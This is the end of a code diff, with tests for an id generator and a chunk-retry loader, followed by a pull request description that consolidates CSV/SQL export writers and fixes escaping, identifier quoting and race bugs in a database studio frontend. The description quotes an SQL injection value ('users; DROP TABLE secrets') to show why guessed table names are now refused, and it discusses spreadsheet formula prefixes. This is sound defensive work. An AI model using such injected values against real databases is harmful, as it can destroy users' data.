+    // eslint-disable-next-line @typescript-eslint/no-explicit-any
+    (crypto as any).getRandomValues = (array: Uint32Array) => {
+      values.push(array.length);
+      array[0] = 1;
+      array[1] = 2;
+      return array;
+    };
+    try {
+      expect(newLocalId()).toBe("12");
+      expect(values).toEqual([2]);
+    } finally {
+      // eslint-disable-next-line @typescript-eslint/no-explicit-any
+      (crypto as any).getRandomValues = original;
+    }
+  });
+
+  test("does not repeat across a run long enough to matter", () => {
+    const seen = new Set<string>();
+    for (let i = 0; i < 5000; i += 1) {
+      seen.add(newLocalId());
+    }
+    expect(seen.size).toBe(5000);
+  });
+});

--- a/tests/unit/lib/lazy.test.ts
+++ b/tests/unit/lib/lazy.test.ts
@@ -1,0 +1,44 @@
+import { describe, test, expect } from "bun:test";
+import { lazyRetry } from "@/lib/lazy";
+
+describe("lazyRetry", () => {
+  test("loads once when the chunk arrives", async () => {
+    let calls = 0;
+    const load = lazyRetry(async () => {
+      calls += 1;
+      return "module";
+    });
+
+    expect(await load()).toBe("module");
+    expect(calls).toBe(1);
+  });
+
+  // A chunk request that fails once and succeeds on a retry is the common shape of a
+  // flaky proxy or a dropped connection — the case where retrying is the whole fix.
+  test("retries once and returns what the second attempt loaded", async () => {
+    let calls = 0;
+    const load = lazyRetry(async () => {
+      calls += 1;
+      if (calls === 1) throw new Error("Loading chunk 42 failed");
+      return "module";
+    });
+
+    expect(await load()).toBe("module");
+    expect(calls).toBe(2);
+  });
+
+  // Twice is enough to tell a blip from a file that is genuinely gone — which is what
+  // an upgrade under an open tab produces. The rejection has to reach the boundary
+  // above, or the view suspends forever.
+  test("gives the second failure to the boundary rather than retrying forever", async () => {
+    let calls = 0;
+    const load = lazyRetry(async () => {
+      calls += 1;
+      throw new Error(`attempt ${calls}`);
+    });
+
+    expect(load()).rejects.toThrow("attempt 2");
+    await Bun.sleep(600);
+    expect(calls).toBe(2);
+  });
+});


### PR DESCRIPTION
## Description

Three hand-rolled CSV builders had grown up in this tree, and two of them quoted a cell by wrapping it and nothing else: `"${val}"`. One cell holding a quote, a comma or a newline — ordinary contents for a `text` column — ended its field early and shifted every column after it for the rest of the file. The file still opens, so the damage is silent; it is the columns that are wrong.

Closing the copies into one writer (`src/lib/export/`) exposed what the duplication had been hiding: unquoted column names, a table name interpolated straight from the tab title, a DDL type read from row 0 alone, a download Firefox never fired, and an object URL revoked out from under its own read.

Reading the same surfaces turned up two more unrelated defects — the residual EXPLAIN-ownership window this repo had already written down as `U1`, and a chart export still painted on the theme it was first rendered on — so they are fixed here too. The code-splitting work is separate and is marked as such below.

## Type of Change

- [x] Bug fix (non-breaking change which fixes an issue)
- [ ] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [x] Documentation update
- [x] Code refactoring
- [x] Performance improvement
- [x] Test addition or update

## Related Issue

No tracking issue. `U1` in `docs/BACKLOG.md` is closed by this PR and removed from the file; everything else was found while reading the export path during a frontend review.

## Changes Made

### `fix(export)` — one writer, and the five defects the copies hid

- **`src/lib/export/csv.ts`** — RFC 4180 escaping. An absent value is an empty field rather than the word `null`; a `Date` is ISO; a JSON column is JSON rather than `[object Object]`. Rows are read **by name** from the result's own `fields`, so a row whose keys arrive in another order — or a document-store row missing one — lands in the right column instead of shifting the rest.
- **`src/lib/export/result-export.ts`** — the CSV/JSON/INSERT/DDL writers, previously duplicated in `Studio.tsx` and `StudioWorkspace.tsx` and already drifted apart (different tab-name regexes, masking in only one of them).
- **`src/lib/export/download.ts`** — the blob hand-off, previously copied at seven call sites.
- Column names go through `quoteIdentifier`, so an aliased column (`count(*) AS "n, m"`) can no longer end the list it sits in.
- The table name is **guessed** from the tab title, so it goes through `isBareIdentifier` and is refused rather than escaped. A tab named `Query 1` produced `INSERT INTO 1 (…)` — not valid SQL anywhere, because the intended `|| "table_name"` fallback never fired on a truthy `"1"`. A tab named `users; DROP TABLE secrets` reached the file verbatim, in a file whose whole purpose is to be run somewhere else, unattended (#290's threat model).
- A DDL column's type is read from the first row that **carries a value**, not from row 0: a column that happened to be NULL in the first row was typed `TEXT` regardless of what the other ten thousand rows held.
- The download anchor is attached to the document before it is clicked, which is what Firefox honours; a detached `<a download>` simply did nothing there.
- The object URL is revoked on a later task. The click only *starts* the download, and revoking in the same task can pull the blob out from under a read that has not begun — which is why it showed up on large results and never on the small one a developer tries.

### `fix(query)` — a plan can no longer outlive its run

- Ownership was read from the presence of an entry in the in-flight map, but a run deletes its own entry when it settles: run A finishes, run B runs and finishes, then A's slow EXPLAIN resolves, finds nothing, reads as **not** superseded, and writes A's plan over B's results.
- It is now decided by the last run **started** on that tab, which outlives the map entry. The same guard closes a `setState`-after-unmount window that the old reading left open.
- Written test-first: the new test fails on the previous implementation.

### `fix(charts)` — export on the theme the chart was read on

- `DataCharts`' export ran on an empty dependency list while reading `viz.exportBackground`, so after a theme toggle a PNG was still painted on the ground the chart was first rendered on — a light chart exported onto near-black. The same defect #384 fixed for the ERD, in the surface that fix's own comment points at.
- `StudioWorkspace`'s export had the same shape, missing the connected dialect from its dependency list.

### `perf` — split the panel's heavy views and the ERD out of the first load

- The bottom panel's mode-gated views (`DataCharts` and recharts with it, `VisualExplain`, `SchemaDiff`, `PivotTable`, `DatabaseDocs`) and the ERD (`@xyflow/react` + elk + snapdom) are now split.
- `React.lazy`, **not** `next/dynamic`: both surfaces are reached from the embeddable shell, which imports nothing from `next` by construction, and a `next/dynamic` here would put the framework into the published package's module graph.
- `optimizePackageImports` covers the barrels the app imports by name.

### `refactor` — the small things the review named

- Eight `console.*` calls in components and hooks now report through the shared logger. The only `console` references left under `src/components` and `src/hooks` are the two comments describing `QueryEditor`'s deliberate Monaco override.
- `SchemaDiff`'s diff rows are keyed by the name they are about rather than by position, so a recomputed diff cannot reuse one column's row for another's.
- Four id generators — two of them a 4–6 character `Math.random` slice, one on the deprecated `substr` — are now the crypto-backed one the query-history row already used.
- `Loader2` is spelled `LoaderCircle` at the one new icon site: on lucide-react 1.x the former is a legacy-rename alias shipping no `@deprecated` tag, so nothing warns while it is alive (`docs/BACKLOG.md` P6).

## Testing

- [x] I have tested this locally
- [x] I have added/updated tests
- [x] All existing tests pass

Verified green on the current `main` merge base: `format` · `lint` (0 errors) · `typecheck` · `knip` · `build` · `build:lib` · `attw`.

Coverage gate: **36460/36460 lines (100.00%)**. The four new modules are individually at 100% (`csv.ts` 33/33, `download.ts` 13/13, `result-export.ts` 54/54, `ids.ts` 3/3).

Test layers: `test:components` 0 failures; `hooks` + `security` + `evals` 794 pass / 1 fail. That one failure (`useQueryAdapter > executeQuery sets safetyCheckQuery for a write hidden behind an unresolvable literal`) is **pre-existing** — it reproduces on the untouched tree via `git stash`, and it is the `mock.module` cross-file contamination `CLAUDE.md` documents. It passes when its file runs alone.

The core layer reports 105 failures, **all of them** `Executable not found in $PATH: "helm"` on this machine — 105 failures against 105 helm-not-found errors, an exact match, and identical to the count on the untouched tree. Nothing to do with this change; CI has `helm`.

New tests: `csv.test.ts`, `download.test.ts`, `result-export.test.ts`, `ids.test.ts`, plus the EXPLAIN-ownership case in `use-query-execution.test.ts` and the revoke-timing cases in the two shell suites. `BottomPanel.test.tsx` gained a `beforeAll` that mounts each split view once, so its assertions stay synchronous and stop depending on the order tests happen to run in.

Three existing tests were updated rather than deleted, because the behaviour they pinned was the defect: the CSV assertions now expect escaping and an empty NULL field, the SQL assertions expect quoted column names, and the `SchemaDiff` fetch-error test spies on the logger instead of `console.error`.

**Not done:** no browser or Playwright run, and no run against a live database engine — this change is verified by the test suites and the build, not by a manual pass.

## Test Environment

- **LibreDB Studio Version:** 0.11.0
- **Browser:** not exercised (no E2E/manual pass in this PR)
- **OS:** Linux
- **Node.js/Bun Version:** Bun 1.3.14 / Node 24.14.0
- **Database Type:** none live — provider tests run against their existing mocks

## Screenshots (if applicable)

None — no visual change. The only new UI is a spinner while a split chunk is in flight.

## Checklist

- [x] My code follows the project's code style guidelines
- [x] I have performed a self-review of my code
- [x] I have commented my code, particularly in hard-to-understand areas
- [x] I have updated the documentation accordingly
- [x] My changes generate no new warnings
- [x] I have added tests that prove my fix is effective or that my feature works
- [x] New and existing unit tests pass locally with my changes
- [x] Any dependent changes have been merged and published

## Additional Notes

**Exported bytes change, deliberately.** A CSV cell that is NULL now exports as an empty field rather than the four letters `null`, and a cell is quoted only where RFC 4180 requires it rather than always. Anything downstream that parsed the old output by position was already reading shifted columns whenever a cell held a quote or a comma, so there is no correct consumer to break.

**Two names, two rules, and the reason they differ.** The table name is *guessed* from a tab title, so it is interpolated unquoted and refused when it is not a bare identifier — quoting a guess would pin a case the database may not use (`INSERT INTO "Users"` fails where the folded `users` exists). Column names come from the engine's own `fields`, so quoting them preserves them exactly and is always right. Both rules are stated in `src/lib/sql/identifier.ts`, which already existed; the export path simply was not using it.

**Deliberately not done, recorded so the next reader does not re-derive it:**

1. Neutralising a leading `=`, `+`, `-` or `@` in a CSV cell, which a spreadsheet reads as a formula. A real hazard and a separate decision, because the fix mutates the user's values on the way out. The reasoning is left in `csv.ts` rather than only here.
2. Gating the always-mounted modals (`DataProfiler`, `CodeGenerator`, `TestDataGenerator`, `DataImportModal`) so their chunks could be split too. They render `null` when closed but stay mounted, so lazy-loading them buys nothing until the mount is gated — and that changes mount semantics (state resets on close), which is its own review.
3. `Studio.tsx` memoization. Code-splitting is not that fix: 14 `useState`, no `useMemo`/`useCallback`, no memoized children and React Compiler off mean every keystroke still renders the tree. It is the largest remaining item from the review that produced this PR, and it touches every prop in the shell — deliberately not mixed in here.
4. `framer-motion` is still in the first load: `Studio.tsx`, `ConnectionModal`, `SchemaExplorer`, `ConnectionItem` and `TableItem` import it statically and all mount on arrival. recharts and `@xyflow/react`/elk did come out; that one did not.
5. Index keys elsewhere. `SchemaDiff` was the file the review named and is fixed; 43 index-keyed lists remain across `VisualExplain`, `DatabaseDocs` and the monitoring/admin tabs.

**Scope:** this is a frontend-only change. Nothing under `src/app/api/`, `src/lib/db/`, `src/lib/agent/`, `src/lib/storage/`, `src/lib/seed/`, `src/lib/llm/`, `src/proxy.ts`, `charts/` or the Dockerfile is touched, and the added lines contain no `"use server"`, `node:` import, `process.env` read or `NextRequest`/`NextResponse` use. The new `src/lib/export/*` and `src/lib/ids.ts` are browser-only (`document`, `Blob`, `URL.createObjectURL`, `crypto.getRandomValues`) and every one of their 13 import sites is a component, hook or the workspace shell.